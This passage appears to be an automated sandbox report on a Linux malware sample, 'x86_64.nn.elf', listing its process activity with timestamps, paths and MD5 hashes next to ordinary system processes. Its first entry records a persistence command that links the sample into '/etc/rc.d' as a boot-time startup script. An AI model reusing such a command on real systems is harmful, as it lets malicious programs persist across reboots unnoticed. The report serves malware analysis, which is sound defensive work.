                                  Arguments:ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf
                                  File size:76160 bytes
                                  MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:54:35
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:54:35
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:54:37
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:54:37
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:54:54
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:54:54
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:55:10
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:55:10
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:55:38
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:55:38
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:56:16
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:56:16
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:56:21
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:56:21
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/usr/libexec/gnome-session-binary
                                  Arguments:-
                                  File size:334664 bytes
                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/usr/libexec/gsd-housekeeping
                                  Arguments:/usr/libexec/gsd-housekeeping
                                  File size:51840 bytes
                                  MD5 hash:b55f3394a84976ddb92a2915e5d76914

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/usr/lib/systemd/systemd
                                  Arguments:-
                                  File size:1620224 bytes
                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                  File size:22760 bytes
                                  MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                  Chronological Activities